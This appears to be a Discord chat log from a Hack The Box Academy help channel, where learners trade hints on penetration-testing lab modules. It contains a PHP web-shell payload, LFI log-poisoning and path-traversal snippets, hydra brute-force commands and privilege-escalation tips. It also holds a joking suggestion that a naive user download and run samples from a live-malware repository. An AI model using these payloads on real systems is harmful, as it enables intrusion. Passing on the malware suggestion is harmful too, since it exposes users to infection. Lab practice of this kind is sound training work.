#modules
Bruteforcing Usernames: Anyone else having problems with the machine? I've re-spawned it several times, every time it stops working after about a minute or so.
I have spent numerous hours and days on the Using Web Proxies - Repeating Web Requests section and cannot figure out what they want me to input for the answer for the second flag. I have completed the entire rest of this module and have a complete understanding. I just dont know what they want inputted as the answer. Can somebody help me out please?
not starting the target and not ssh into it
Solved
i have other question
i have like 1:30 hours try in commands
like simplehttpserver
but i can't find what command is
i do manually the http server but can't find the command
have a bug
i can't see the hint
and the cheatsheet
idk what happened
SOLVED
thanks @hollow hinge
Hey
I hv just started with this thing
And i dont know how to connect the ovpn file
Can anyone help pls
can it be that https://academy.hackthebox.com/module/17/section/64 is bugged?
the whole module revolves around wordpress but when i go to the target i don't find wordpress
Guys can I play hack box even if I have started to learn python day ago ? Or I need to know just kali? I mean the unix itself kali
And is there a real hacking process and nothing fake created? Like Mario the story ?
I would say you can just try it 🙂
If you realize that you are not quite there with the knowledge, you can register in the hack the box academy: https://academy.hackthebox.com/dashboard
Thx bro
Is that for free?
Because I really want to become a hacker
I learn unix I learn python and will start to learn html
No but it is very good 😄
sometimes you hang here and there like me now xD
but the learning effect is very good
hint the wordpress isn't in that domain
if you are new to this watch this to know how to become a hacker also where you can get free stuff https://www.youtube.com/watch?v=lhz0-qAQlBM
Sponsor: https://go.intigriti.com/thecybermentor
Blog Post: https://tcm-sec.com/so-you-want-to-be-a-hacker-2022-edition/
Academy: https://academy.tcm-sec.com
Timestamps:
0:00 - Introduction
0:53 - Intigriti Sponsorship
1:55 - Building a Foundation
2:10 - Important Notes
5:37 - Basic IT Skills
8:28 - Networking Skills
12:38 - Linux Skills
17:04 ...
||yep||
||god damn !||
but you need to find the right domain first
well .. how ? 😄
Take a closer look at the source code of the website 😉
ah i found the url .. overthinking
anyone for a nudge on the file upload attacks skills assessment? i can't find the upload path
.
u mean of ||script.js||?
Hey, currently in Attacking Common Services/SMTP Attacks, found user m, trying to bruteforce with provided list and rockyou.txt, but nothing. Is bruteforcing the correct way to get password of found user?
yes that's the right way but did you use the full mail address?
nope that that file named ||upload.php||
ohh, got it. thanks
tried that but I can't get to read it
try with ||base64||
@copper creek Mb i was thinking on File Inclusion module
can i dm u?
sure
I have spent numerous hours and days on the Using Web Proxies - Repeating Web Requests section and cannot figure out what they want me to input for the answer for the second flag. I have completed the entire rest of this module and have a complete understanding. I just dont know what they want inputted as the answer.
the flag is at / so try to cat flag.txt
how can i get started?
hi pls delete this you can't put htb academy flag in to discord some admin or mod will remind you about this
ok sorry
it's fine , just delete the msg
to get started with htb academy try this https://academy.hackthebox.com/module/details/15 or with hacking in general try this https://www.youtube.com/watch?v=lhz0-qAQlBM
Hello great guys, I am new here, just starting a cyber security career, any help and tips pls 😫 🙏 🙏 🙏, best guideline, pls need mentorship too, thanks
my message is right on top of your
I need some help with the final host of the live engagement of shells and payloads. I assume I need to disable smth on the machine so that blue can work, but my shell keeps on crashing, forcing a restart of the whole environment. Any tips on how to make a more stable shell or a different method would be appreciated.
you dont need to do anything but run the correct exploit.
Hello, I'm new.. does anyone has the software download for the flipper zero?
I just google it, thats nice but i think we dont use it here
Never ever heard of this tool.
Maybe on their website? https://flipperzero.one
hak5 have better stuff
Some of the hak5 stuff you can build yourself tho
Im not paying 60$ for a rubber ducky
me too 🤣
This flipper zero tool seems kinda cool tho ngl
Thanks for the hint, was able to get the flag.
if you are just looking for the software i think you can download it on their github https://github.com/flipperdevices
i dunno man , i have a cheap little digistump board that i can write to with arduino software and i have literally never gotten a payload to work properly. At least the ducky actually works right?
Tru. I don’t know how good the quality is, but I like the idea and dolphins are cute
Thanks everyone
I bought some boards and 4 of the 5 were DOA. The 5th one tho works and I have used it to grab wifi passwords. Have been trying to get a keylogger to work but cant seem to get it to work so far.
nice
Decent specs too
i dont even want a working server or networking equipment
its just for appearance
while i use my windows laptop connected to home wifi
basically if you are trying to be a security professional
and you dont have a server rack or random pieces of networking equipment all over your house
you are doing it wrong
Im having a problem understanding how to complete the skill assessment of the Windows Fund. module. Im currently done with all the questions but I am trying to complete the other steps for better practice
I cant seem to "find" the default group that needs to be removed when adding HR to the folder Company Data it doesn't show the default group
And when I thought I did, I went to the disable inheritance step and my HR group has an enumeration error of permissions in its container
isn't the default group ||Everyone|| ?
gawd, the File inclusion skills assessment RCE keeps breaking
anyone around who can help with a nudge on Broken Auth Skills assessment? I'm stuck on getting the admin panel.
for the last RCE part use single quotes instead of double quotes for your payload
if you are on the ||support|| user that isn't the admin user also there is no admin panel the flag i think is in the profile page
@vital adder mind if I DM you?
sure
hey guys I'm new. I'm stuck on responder evil-winrm is throwing an error about my python path not being complete. I've uninstalled and reinstalled it a few times still no luck. I did read something that talked about going into the source code deleting a line and that worked before i went through that i was hoping someone may have some advice. I'm also getting a 502 error for Three when i use gobuster to find the s3 bucket. I'm wondering why and how can i get around it? I've tried to reset the machines and I've gone as far as to restore my kali image to an original snapshot. Any advice on these issues would be appreciated thank you.
hmm, it becomes irresponsive when i use single quote
which module and section?
its in starting point tier 1 i may be in the wrong chat for help if i am i apologize
try this payload ||<?php system($_GET['cmd']); ?>||
thats the payload that i used and then with this
..//..//..//..//..//..//..//..//..//..//var/log/nginx/"hidden".log&cmd=id
i didn't use ..// but if that work i don't think that is an issue but you are using the wrong log file
let me dm you
sure
Hey. I'm in the module "shells and payloads" at "The Live Engagement" and I'm having problems with the Eternal Blue exploit I need to use to solve this question:
Exploit and gain a shell session with Host-3. Then submit the contents of C:\Users\Administrator\Desktop\Skills-flag.txt
Someone did this?
if you use the right exploit you should get a rev shell and you can get the flag from there if you can't get that work there is an exploit that let you run 1 command you can use that to read the flag
I'm using eternal blue exploits in metasploit but it isn't working. Can you give me 1 hint about the command you are talking about?
that is an exploit not a command and exploit is ||ms17_010_command|| also what exploit did you use for the eternal blue
Thanks MRtom
how to activated win 11
how to hack gmail
for recovery purposes
and to get rid of the secret government service
hihihihihihihi
and how to protect the computer from hackers
you are your anti virus
Download the programs from here and run https://github.com/ytisf/theZoo
This can help you hack gmail 😱
@fading bough here is the answer for all of your questions, pls don't share this every 3 letter government agencies are looking for this
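Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you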
one of the leader of anonymous need help from other to hack gmail
haha
Can’t tell if this is trolling or serious haha
the police department hackers made anonymous
and also they made the discord app
well my englist is petty bad
yeah
i will try read this guys to improve my english
I am vice leader of anonymous
Your english is good
English is super difficult haha
to avoid hackers you have to make your own operating system
no use UwUntu
and your own programming language
i am the owner of Arch
Written in python
Can I dm someone about Attacking Common Services Lab Easy? Found creds, but then stucked
i want to live forever
but i need help from others people
to make the machine that make you live forever
here you are right
._.
so i have to make people want to live forever
so other start to work on the project of living forever
in the future people will be able to leave forever
sure feel free to dm me if you still stuck with that
good for you
is a waste of time
i waste my life on the first chats room ever created
use TempleOS, that has a custom programming language named HolyC, both made by a crazy talented programmer that believed god had chosen him to build this
One piece is hype
Wano arc is awesome so far
Also stop spamming this channel Lmfao
discord is the son of those chats rooms
thoses are the first chats rooms ever created
pls sent my the link for dowlaod the noescape.exe
no troll
is noescape a photo editing app?
my pc cant handle more virus so i cant risk my self of getting that virus
ok
For all those people who find it more convenient to bother you with their question rather than to Google it for themselves.
well let me keep trying to learn programming
so i can get a job
after ten years of trying
i am finally understanding it
i believe that i am halfway through learning C#
we believe
i am learning making apps and watching youtube tutorials
so to live forever before i die
i need at least 10 million people working on living forever
i probably have to make posters and put them on the street
..... a virus is a program
just sharing my knowledge to pay others for helping me
the series mr robot might be helpful for beginners
i am mr robot too.....
i will try to make a bot for discord i might made 10 dollars
each month
and hopefully no one try to hack a bank
is a very bad idea
zero days hunter is a better idea
nowadays the police can find you without any information
...........
i want to live forever
wrong server then
step aside from the keyboard and take a break
next nonsense that you paste will result in a kick
++kick @fading bough
1.5 billio again
programmerx got the boot!
hi dpgg while you here there is a guy posting a flag about some module i did tell him to remove that but he didn't so can you remove that?
🤣
dpgg did the 911
Can anyone give me a hint on active directory skills assessment 2. Trying to grab the flag on sql01. I have xp_cmdshell going but no access to admin user
he hacked the plane
spooner you should also try to live 10 000 years
or live forever
@fading bough (1015286483646697592) has been muted for 10h.
where can i learn to be a script kiddie
Hi
@jade pendant HI
What's up
Okay, I'm having a really weird issue. I am working on Attacking Common Services: Easy Lab. I found a user name for the ||smtp|| server. I am using hydra to try and brute-force the password using rockyou.txt on ||pop3||. Everytime I do, though, be it my attack box or the Pwnbox, hydra starts running, then after a moment, outputs a C and then freezes up. I end up having to terminate hydra with Ctrl-C. Am I the only one who has had this issue? This only seems to happen with that particular protocol. Nvm. I'm dumb. I was trying to use a protocol I didn't have an open port for.
Hello. Any help for module Secure coding 101 javascript question :
On '/Reverse' you will find an obfuscated JavaScript code, but it appears to be broken, and doesn't return the flag! Try to reverse it to understand how it should be working, and fix it to get the flag.
thanks
Is there a discord group for tryhackme ?
Okay, so for Attacking Common Services: Easy Lab, I have full credentials, but I'm not sure what direction to go to from here. Any nudges?
@vale salmon try to ||write a php shell into the xampp webroot .... there are two ways to do it !||
Ahhh, thanks
Could some one tell me what command to use to get to the root server
wish i could help dawg , i'm still stuck on custom decoder T__T
Okay, so on the Attacking Common Services: Easy Lab, I'm having trouble figuring out how to ||upload my reverse shell to C:\xampp\htdocs||. I've tried a few methods with no luck. Also, my target keeps running out of time at a rapid speed, which is odd and annoying.
are you trying to do it through ||sql or core ftp?||
I was trying with ||ftp||, but it takes forever to get a response from the server and it won't let me cd out of the directory it drops me in. Is ||sql|| a better option?
eh , different way to skin a cat
Mind if I dm?
sure
hi can anyone help me with Firewall and IDS/IPS Evasion - Medium Lab. kinda lost Solved. Thanks those that helped.
Where are you stuck at
Managed to get a list of ports, but only ||53 ||and ||445 ||is filtered. But unable to retrieve the version needed
What script did you try?
tried with sV option
DM me
Predictable Reset Token (Broken Authentication module): Someone could give me a nudge? I think I know what they want, but spent hours on it and still doesn't work. Just want to see if my approach is good or way off.
Don't advertise here, it's against our rules. Thanks.
hey! anyone can help with Information Gathering - Web edition / Active subdomain enumeration section?
thanks!
Feel free to DM me
Did you find the solution?
Hi I have problems with ATTACKING COMMON SERVICES -> Attacking Common Services - Hard module. I can login via RDP using F*** user, however I can not login into MSSQL server. I have tried via management studio and via sqlcmd. I tried with command as "sqlcmd -S WINSRV02 -U F+++ -P '+++' -y 30 -Y 30" but no success
I can help you if you want 🙂
nobody find the flag ?
hi everybody, i'm stuck in File Upload Attack module on Limited File Uploads, on question 1: "The above exercise contains an upload functionality that should be secure against arbitrary file uploads. Try to exploit it using one of the attacks shown in this section to read "/flag.txt"" .... i've tried all payloads but the app doesn't display anything .... any help??
Which flag?
The last 2 flags for secure coding 101 JavaScript.
ok, i get it
Have you been able to solve it (Bruteforcing cookies, 1st question). I decoded the cookie and changed it, but it doesn't work. Would like to know if I'm missing anything here.
I used sqsh to access the MSSQL server with this command ||sqsh -S <target IP> -U .\\f**** -P <password> -h ||
hi, I'm going through the knowledge check in getting started module but I'm stuck at exploiting getsimple cms. it seems that the server is somehow dropping all POST requests - I'm not able to edit the theme to include reverse shell php code, same thing is happening when I use metasploit with RCE exploit. just getting no response at all from the server. the file upload button is not working as well. did someone have the same problem? I've seen one person mentioning it in the forums but they got no response to this. EDIT: it seems that it's a bug when working from Parrot OS VM, it works fine with pwnbox. I'll report it in #858470491676737536
better command is ||never gonna give you up never gonna let you down||
Haha thanks bud! I think I have read the section over like four times, I have the JS unpacked and have renamed all the variables so that my code matches the examples. But i honestly just don't understand what i am supposed to do to "use" the decoder and produce the answer, Am i supposed to use the console in the browser tools or something?
Heyy all,
I am stuck at Predictable Reset Token question 1. I modified the script for the proper timezone and user but still is not working. If anyone could give me some help it's going to be great.
10x in advance
try this ||never gonna give you up never gonna let you down||
Hi guys. How much I will pay in total for the Junior Pentester path?
that info is on the path Cubes Required: 1970
Thanks. Still learning enumeration 😅
hello i am stuck at end of module USING WEB PROXIES
hello everyone, nice to meet you, i've just graduated from highschool in it science, i'd love to work one day as ethical hacker, and so i just sign up on htb academy. I'm actually a fullstack developer and i know networking pretty good but Im new into cybersecurity field, do you guys have some tips, even youtube channels or also other sites that could help me learning? Thank you very much
i need to know how to fuzz the words together and output it in a file
for example (word) would be milk - and (letters.txt) would be a-z, then output it (word_letters.txt) would be milka milkb milkc milkd...
i know ffuf can do it, but i really can't find anything today
i'd recommend hackersploit on youtube
thank you, do you recommend more htb academy or tryhackme for a newbie? i would like to use both but idk actually 🙂
if you have some developer experience and know a good bit about networking then you already have a good foundation here check this video to see what you are missing then you are good to go https://www.youtube.com/watch?v=lhz0-qAQlBM
i would recommend tryhackme it's more beginner friendly
question 3 in the Skills Assessment?
ok, thank you very much, im gonna check that too
if you are on the Skills Assessment you also need to encode the word and i don't know if ffuf can do that (no idea didn't use that tool much) i'll recommend burp for that
any hint?
Any hints on how to get to MS01 on the Active Directory skills assessment 2? I'm running printspoofer from SQL01 but not sure how to leverage that to get over to MS01. From chat history, lazagne isn't dumping any passwords
after upload your payload check the web source code
try getting|| a system level shell on SQL01 and then run lazagne... we should be able to find creds for a user with local admin rights for MS01||
oh thanks , i'm looking in the wrong directory
hi everyone , how to bypass LFI filter ".." string ?
@little burrow you could try four dots and two slashes 😉
@west canopy yep , but not work with me 😦 , filter code look like "||<?php
if(!isset($_GET['page'])) {
include "main.php";
}
else {
$page = $_GET['page'];
if (strpos($page, "..") !== false) {
include "error.php";
}
else {
include $page . ".php";
}
}
?>||"
I tried to RCE LFI by poisoning logs at ||/var/log/nginx/access.log&cmd=id|| with user-agent = "<?php system($_GET["cmd"]); ?>" but without success , can anyone suggest me ?
I dont know ur situation but took me many tries too xD
😢
anyone else get flag4 before flag3 on linux privesc skills assessment? 😂
I am in the module "getting started". and in one of the sections I have to get a banner of the server. I connected to the ssh and used netcat
but it doesn't work
after a little bit, it says timeout
Anyone help?
someone send me a virus
On the Attacking Common Services: Medium Lab, should I use the provided users.list or a list from SecLists?
Contact Discord Support if you think someone hacked your Discord.
@vale salmon do you want to invade my discord?
No, I have my own Discord account.
@shut orchid No, and I will block you if you persist
Hello everyone, I'm trying to crack a private ssh key, but I would like some guidance. I tried to ssh2john (ssh2john id_rsa > id_rsa.hash) to convert it to a hash, but I get this message "id_rsa has no password!" Any pointers on leveraging an SSH private key?
михо.rwr
@spark vector What module are you working on?
@vale salmon Footprinting Lab - Hard
@spark vector I can't remember for certain, but if you have the username associated with that id_rsa, you should just be able to ssh in with it using ssh -i id_rsa <username>@<target ip>
what a wonderful dialogue
jansefpyder-magdielcrhis-jamesbap-
@spark vector can you create a bank account for me to save money?
@vale salmon Thank you. I tried that, but I think I have the wrong username. I'll keep enumerating. I get this when I run ssh
Load key "id_rsa": invalid format
USERNAME@TARGET IP: Permission denied (publickey).
Yeah, you may have the incorrect user. It's been awhile since I did that one, sorry.
what is this server doing🤨
@vale salmon Don't sweat it. Thanks for the reply.
Sure thing!
if you got the key already for the user ||t**||, you need to assign it the right permission using ||chmod 600 id_rsa|| then you can use it to ssh the box
I tried this but I get this:
ssh -i id_rsa t**@TARGET IP
Load key "id_rsa": invalid format
t**@TARGET IP: Permission denied (publickey).
@stray grove create a paypal account for me
@stray grove I think it might be the username because if I use a different username I get prompted for a password. I still get the invalid format though
the username start with t, if you did an snmpwalk enum you'll find some credential. you need to enumerate snmp service first
@stray grove Did that. I got the password.
If I use ssh t@target IP, I get the invalid format and Permissions denied. But, If I use b@target IP, I get the invalid format and it prompts me for a password.
did you get the key using the credential you got from running snmpwalk after logging into the ||imap service||?
Yes
then check the key, must have some blank spaces in it...open it using sublime
@stray grove Now I have to know what sublime is 🙂
it's a text editor, if you're using pwnbox it's on the taskbar
both won't help you on that one, you need to run a full scan and enumerate ||the last port found open||
@stray grove That was it! When I copied the SSH key locally, there were white spaces all over it. Cleaned it up and now SSH is working. Thank you.
Hey yall! Can someone help me with the File Inclusion Assessment? All LFI attempts I am trying is only returning 'Invalid Input Detected'
So I found port ||30021||, but when I use nmap on that specific port, I get ||Invalid Command: try being more creative||. When I use the ||ftp-brute script||, I find no valid accounts. I'm sure I'm missing something. Could I possibly get a nudge?
Can anyone teach me also?
try to read the ||index|| file (not by view source)
Can someone help me with the ffuf skills assessment? I’ve been at it for a month, but for some reason, my ffuf doesn’t return an important result for me.
that have ||anonymous login|| why didn't you try that first
which question?
The third fourth and fifth questions.
Eh, I didn't realize it had an ||Anon login||. Usually nmap mentions that, but it didn't this time.
oh i think you need to use a deep scan for that i use -A
You might be asking yourself: why is a pro-hacker here asking for help on a beginner module?
Ahhh, right, I'll add that to my flags for next time
You are definitely not the first. 🙂
you don't know what you don't know and that's fine
i need help with a lot of dumb stuff here and finished like 400 room on tryhackme and i'm still dumb
Even ippsec had to ask 0xdf for help while doing the fingerprint box.
I remember he said that in the video writeup he did for that box.
Yep. We all have gaps to fill in, constantly
oh sorry i didn't see this but you need spam restart it a few time if ffuf can't find it, some one show me this trick and i also have this issue the first time i do that part
Yeah, I had the same issue with that one
maybe it’s the command I’m running? Can I post it publicly or do I have to drop into a DM for that?
Or with a spoiler flag?
if it's just the command i think it's fine because you didn't find anything with that also spoiler tag
oh and for the ffuf scan try the extensions you found from the ||second question||
||ffuf -u http://test.academy.htb:PORT/ -w ~/SecLists/Discovery/Web-Content/raft-small-words.txt -e php,phps,php7||
And I do that for all three virtual hosts
I even tried matching regex for the page content mentioned in the third question, but nope.
oh you are on the wrong ||virtual hosts|| in this command also the page you need to find is in a ||directory|| so you need find that first and the page you need is in that
I forgot to include the recursion part, because I’m running it with recursion depth 3.
and no idea if this help but i use ||directory-list-2.3-small.txt||
Tried different wordlists, and I used that one.
I do find that directory. Maybe I need to not use recursive mode once I find it?
maybe not sure but try that
but maybe the reset trick works.
What do I do? Send a bunch of RST packets to the host? That won’t help much.
try this first if you ffuf still can't find it shoot me a dm i'll help you troubleshoot
I’ll try later. Thanks for the advice.
i just try your command the ||-e|| is not working for me for some reason if i test it individually like ||/FUZZ.php69|| then it work also i have to do the reset thing
||I think I have to use dots: .php,.phps,.php7||
just try that's also is not working for me
Hey.. Thanks! I have access to the admin portal and have now been stuck on how to view the root dir. I can view etc/passwd, etc..
For Attacking Common Services: Hard Lab, should I be using the pws.list provided or rockyou, or something different? Nvm
Okay, I'm stuck. I have credentials for ||fiona|| and can ||RDP|| in with her, but I can't figure out how to grab ||John's|| password (or Admin Credentials)
can i dm you about easy real quick
Sure
I've been working on the medium and hard labs at the same time as you, and I'm finally in a place to help! So, now that you have ||fiona's credentials||, you can ||RDP|| as that user. From there, you don't need to get ||John's credentials||, instead take a look at ||sqlcmd|| and enumerate from there.
Ah-hah! Thanks!
Mind if I DM real quick?
Sure
why do I have access only to the academy channels ?
Dm if you need help with ffuf module
Good morning everyone!
Has anyone done the Footprinting Lab and found the creds without the hint?
I was wondering how to get the creds without the hint.
Which lab level?
Oooops sorry the Easy. The hint showed the username and password, but I would like to know how they got that.
Yup… haven’t tried to find the creds to be honest
It is though for ssh
No worries, moved on to the Medium lab, but if anyone wants to share insight on how to do that lab without the Hint, please do!!
Awesome thanks!
I'm stuck on this one too. ||I've done a ton of enumerating in the different directories|| ||(HTB hint says the other flag is in a different directory)|| and I just can't find anything that looks like a flag.
Are you still stuck on this?
Can anyone give me advice on how to crack the Techsupport folder on a NFS share. (Footprinting/Lab-Medium)
Hey, need help with Attacking Common Services Medium Lab. Found a username, but bruteforcing make no results. Can someone give a hint? Thanks
Which section?
i am sure it must be "AV"
If you found a username, surely you found a note, right?
You don't have to crack the NFS drive.
You can simply mount the drive and then access the folder.
yeah, but permission denied to download or read this file
Hey wanna die
@acoustic owl angry ribbet
<@&817153850845823057>
We got spammer
in the house
hey o mods
we got spammer
and a alt account
THERES A ALT!
i knew it
MODS BAN THE ALT
CAN I HAVE MOD PLS
Can I DM someone about Attacking Common Services Hard Lab?
Sure, go ahead
Hi, I am stuck on the Stack-Based Overflow Linux x86 Skill Assignment. I got a working shellcode with read_file exploit but it doesn't work. Any hint?
i have trouble with target server in Skills Assessment - File Inclusion , It only works for about a minute and it can't load 😦
I can help u, dm me
I'm having a problem with Hacking Wordpress - Skills Assesment can somebody help me?
||So on Attacking Common Services: Hard, I am beating my head against the wall. SQL is not my strong suit. I've found the linked server and even found the testadmin, but I can't impersonate it and can't otherwise figure what to do from here. This lab is driving me nuts.||
don't nuts and if you still have issue with that feel free to dm me
Hello friends
need some help, dunno where to find the cleartext creds for the ||tpetty|| user in the AD enum and attacks module skill assessment part 1
oh wait
might have an idea
can I DM you?
sure
Hello! I must be over thinking things. For Attacking Common Services Easy, I've found an ||email account||, but can't seem to figure out the password. Am I barking up the wrong tree? Just looking for a pointer to get started as I've tried looking at the ||ftp, rdp, and sql|| services but no luck.
use you use hydra to get the password but remember to use the ||mail address|| for the username
yay 🥳
Congrats 🎉
reeee im tryna speedrun AD enum and atks
on day 4 rn tryna get that last section
skill assessment II
i got like 7 module left on the pentest path but i procrastinate so much that i finished the bug bounty path first
I tried that. None of the services came back with anything. I'm using the pws.list from the resources. Should I expand?
use ||rockyou|| also try with the ||smtp||
Hi would anyone be able to help me with the Login Brute Forcing: Skills Assessment - Service Login Section I have found the user :||harry|| a have attempted to brute force the login multiple times and tried using the forums tips and still no luck?
generate a wordlist for that user and filter the password that meet the requirements
😑 finally. I knew there must be a fairly obvious thing I was missing. I'd tried that, but not with that particular combination of service, and lists.
Thank you ❤️
Thanks for the quick reply, I have done that with username anarchy and cupp. the options in cupp I would input is Firstname: ||Harry||, Special Chars✅ ,Leet Mode☑️ and then would use the commands 1. sed -ri '/^.{,7}$/d' <file> 2. sed -ri '/[0-9]+/!d' <file> 3. sed -ri '/[!-/:-@[-`{-~]+/!d' <file>
the regexes here may be slightly off as I had to hand type them from my vm
i have no idea on how to use sed but it look right but for my filter command i filter from ||8 not 7 character|| and for cupp part you are almost right just missing one thing
i can't remember but i think that is the one next to firstname
Surname?
yep that one
so use ||Potter|| I have tried it before but ill give it one more run and get back to you
also does case matter?
in cupp
i think so but you are using the right one
So I am doing the Nibble box/module, and my VPN keeps disconnecting, it doesnt say its disconnected but I have a 100% packet loss, I have restarted the VPN, my laptop and everything else I could think of. Anyone have any advice? Thanks!
are your pwnbox on?
I am using the VPN and using a personal machine
having both pwnbox and your vpn on is usually the cause of your issue but if your pwnbox isn't on then i have no idea, try asking this in #613049811481919508
Alright will do, thanks!
hey unfortunately still no luck
even without filtering just in case my regex is messed up and accidentally getting rid of the correct passwd
i just tried your sed filter command and it's working fine, also are you brute forcing ||ssh||?
yes just in case im stupid I will type out my cmd here
hydra -L username-anarchy/username -p||harry.txt|| -u -f ssh://IP:PORT -t 4
yep that's the right command
Huh i dont get what the issue is and when you tested cupp it was the same as I specified?
yep for the last Y/N in cupp i use Y for the last ||3||
shoot me a dm i'll help you troubleshoot
sure let me try using Y for the last ||3|| and then I will let you know since I was only using 2 before
Hi all.
I am stuck on the last question of SQLi before the skills assessment.
"Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host."
So after getting the shell I used the command ls -la and saw listed directories and files and saw that vendor was the only directory listed. I used the command again, ls -la vendor, and only 2 directories were listed and .htaccess.
I have searched both these directories and "cat" the .htaccess file however no mention of the second and final flag. Can anyone give me a nudge in the right direction, i've been on this question for a couple of days now and just want to move on.
Thanks
@carmine lark DM me 🙂
Going through web proxies and trying to figure out the url encoding / decoding segment, seems like it should be really straight forward, but I'm just not getting a meaningful flag
Look like I do a base64 decode initially due to the = at the end, the next few iterations look like they'd potentially be more base 64 (still have = at the end), but I end up with a string that doesn't seem to have any meaning, have tried all different combinations and looked at the hint and still not really getting anything reasonable
Nevermind, just need to go one more iteration deep apparently
Helloo! Can i DM someone to help me with the last question of DNS on Footprint Module? What is the FQDN of the host where the last octet ends with "x.x.x.203"? I can't figure it out. EDIT: Solved!
@frail garden What have you done to try to answer this question?
You have to find all the zones.
@spark vector I tried to query the zone with dig axfr. Also bruteforce subdomains
@acoustic owl i believe i have found all the zones but no luck finding the host with the .203 octet
@frail garden focus on the keywords.
Hello, I require assistance on the 'Getting started' module. I am currently busy with "Pentesting basics/Public exploits".
I have tried to scan the given target with nmap, but it says the host seems down. I can search the ip in google and it gives me the website. What else do I have to do in order to find the running services?
@short brook try navigating ||to the target:port in your browser with http protocol :)||
With Docker targets, typically nmap scans aren't necessary as there is just a single port open
and you can tell its a docker target when it spawns if it has a long port number after it
for example 10.129.7.40:30385
Ok so how do I find the running services on the website?
look around
it will literally jump out in front of you
when you access the website 😉
maybe there is a way we can|| target the wordpress plugin being used...?||
Hello, I'm currently doing web request module and For the last time I couldn't find server.php file in browser network, it wasn't there.. What might cause that? Am I doing something wrong? *I'm using HTB machine, not mine...
Could I have help with the LFI skills assessment? I was able to get to an admin panel, but I am having trouble with RCE
Anyone around to help with:
Broken Authentication - Bruteforcing Cookies question 1 ???
me too
Were you able to get to the admin panel?
I have the cookie decoded and re-encoded, but it seems like there is some guess-work involved with the role???
every attempt to poison the log file fails
php wrap filter
@little burrow I'm not sure if this will help but I was able to find a log file at || ../../../../../../../../var/log/nginx/access.log ||
Going to try out a log poisoning attack
me too 😦
but the access log doesn't log my user-agent
yeah I think I might be having the same issue
very tough skills assessment haha
@raven cairn i might be able to help
This guessing game is killing me....
@twilit cipher i got you dawg
If someone has a moment and has done the Pivoting, Tunneling, and Port Forwarding module, could you shoot me a DM? I have some questions about the Meterpreter Tunneling & Port Forwarding section.
Wsg
hit me up boo
Hey Yall! Can someone please help me out with File Inclusion assessment? I have gotten as far as accessing both access/error log in admin panel, but nothing I'm doing seems to be working, including poisoning User-Agent and using wrappers
Hey jarednexgent! Would you be able to help me with LFI assessment as well?
Hi. Sorta new to HTB but got back into it after friends I reconnected with helped me get back into trying to learn via HTB Academy. Is there anyone who can help me understand SQL Injection Fundamental - Subverting Query Logic? I'm trying to figure out logging in as 'tom' instead of 'admin'. Not really looking for spoilers since I try to avoid cheating when I learn.
YES
Just got it now. I feel dumb thanks to my overthinking. XD
Hey anyone around to help with the file upload skill assessment? I am stuck trying to get a webshell and I keep getting: 'The image "URL" cannot be displayed because it contains errors.'
i think you need to use a different extension
I'm not so sure, I've tried every extension I can find: ||'.pht' '.phar' '.phtm ' '.phps' '.php' '.php2' '.php3' '.php4' '.php5' '.php6' '.shtml' '.php7' '.php8' '.phpt' '.pgif' '.phtml' '.shtml' '.htaccess' '.inc' '.pHp' '.pHar'||
hint you need to use ||double extension|| also ||magic number||
Yep using both of those already. ||I'm through the blacklist, whitelist, and content filters but my php code will not run||
did you try ||(extensions).jpg|| with the ||jpg magic number||?
Is everyone using the normal target server ? , I turned on target server and it seems to work only for a few seconds and then the website can't be loaded 😦
need help with Active Subdomain Enumeration
Who’s very good at pen testing?
good morning i'm having some issues with the last question of the login brute forcing module... i used this command in order to brute force the password of the g.potter user but it's not retrieving any results and i don't get what i am missing.. hydra -l username -P rockyou-30.txt -u -f ftp://127.0.0.1 -t 4
hello
Hi, looking for help for mybad, i am in ATTACKING COMMON SERVICES - SQL section. i got the mssqlsvc password but when i tried to login using sqsh, it's saying login failed
have you tried the ls command ,just saying
Good Morning! Can I get an assist with the Footprinting Lab - Medium please? I have retrieved the sql creds, and I'm struggling with what to do.
id_rsa, if it exists, will be in the .ssh folder. Probably.
i recommend the tool suBF.sh for this, that tool will brute force by using the su command locally and it was made by the same guy that made linpeas so you can find it on his github
Hi person
do you know hack
what do you hack
Hello, I'm not sure what your question is but keep in mind that we do have #rules
Also this isn't a discord to hire hackers.
====
Hello guys, I would like to find all files containing the string "password", but I want to exclude a specific path such as C:\Windows. How can I do that?
I did try
findstr /SIM /C:"password" | findstr /v /i /C"\\Windows"
But it does not work. Any suggestions?
@loud bone yes I did
oops i don't know what you can do about that, have you like tried to put a / at the beginning
hi, anyone knows if in HTB is there any way to make a search filtered by subject like web, ad or something like this...!!!
@loud bone I think there’s no ssh directory
Hi, for ATTACKING COMMON SERVICES - DNS how do i get the bruteforce to work?
With subbrute
Can anyone give me a hint on Broken Authentication -> Bruteforcing Cookies? I'm not able to decode the rememberme token
Use Decodify
hey! yes 🙂
it gives me the same code as cyberchef.org gives
I don't know what to do with this weird code
DM
DM me if you still need help
AD Enumeration & Attacks - Skills Assessment Part II
Guys need your help with fixing an error with privilege escalation to SYSTEM on the SQL01 using PrintSpoofer.exe.
Who knows what's wrong? How did you get rid of this to receive a shell on your listener? Thanks for any help.
VERBOSE: 172.16.7.60,1433 : Connection Success.
output
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
CreateProcessAsUser() failed. Error: 2
Did you use the 64bit version?
I'm not sure, it is PrintSpoofer.exe
I used ||PrintSpoofer64.exe||
Well, it can be the reason. Thanks man!👍
Hello
can i reset my modules ? 😄
I am finished with the BBP but i want to do it again for the exam
If you find a way let me know. I want to do the same. I know there is a "Retake Module" button, but I don't know if that deletes the progress.
i think that it does
hm
where
If you click on the finished modules, you get to a page where the "Retake Module" button is (where the shareable links are also)
Thanks, @west canopy , that one 😆
damn
do i have to click extra on the "finish" button in the module to come on this page ?
but well thx for that
Has anyone ever experienced changed behavior after respawning a machine? I just spent hours on an exercise and when I respawned the machine I noticed a slightly different request in burp, which made the solution easy. But before the respawn it behaved differently.
which module/section specifically? I dont think i have encountered anything like this
besides the Starting Point machines buggin' out from time to time
I mean your browser is what makes the web request, not the target.
you might get a different response in burp. But different request, i think that is client side 😉
"PHP Filters" section in the "File Inclusion" module. It appeared as if the machine from another section was spawned. It was very similar (that's why I didn't notice it at first - I thought it was supposed to be that way), but the request was different.
Before respawn:
